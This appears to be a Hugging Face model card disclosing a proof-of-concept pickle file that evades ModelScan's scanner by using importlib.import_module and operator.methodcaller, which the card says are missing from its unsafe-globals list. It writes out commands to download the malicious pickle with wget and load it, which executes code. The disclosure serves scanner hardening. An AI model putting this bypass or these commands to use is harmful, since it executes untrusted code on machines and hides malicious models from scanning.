ModelScan importlib + methodcaller Bypass PoC

This repo contains a proof-of-concept pickle file that bypasses ModelScan's PickleScan.

How to reproduce

# Download the malicious pickle
wget https://huggingface.co/xiaoyaoes/modelscan-importlib-bypass-poc/resolve/main/malicious.pkl

# ModelScan says it's clean
modelscan -p malicious.pkl

# But it executes code
python3 -c "import pickle; pickle.load(open('malicious.pkl','rb'))"

Detection gap

importlib.import_module and operator.methodcaller are missing from unsafe_globals.

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support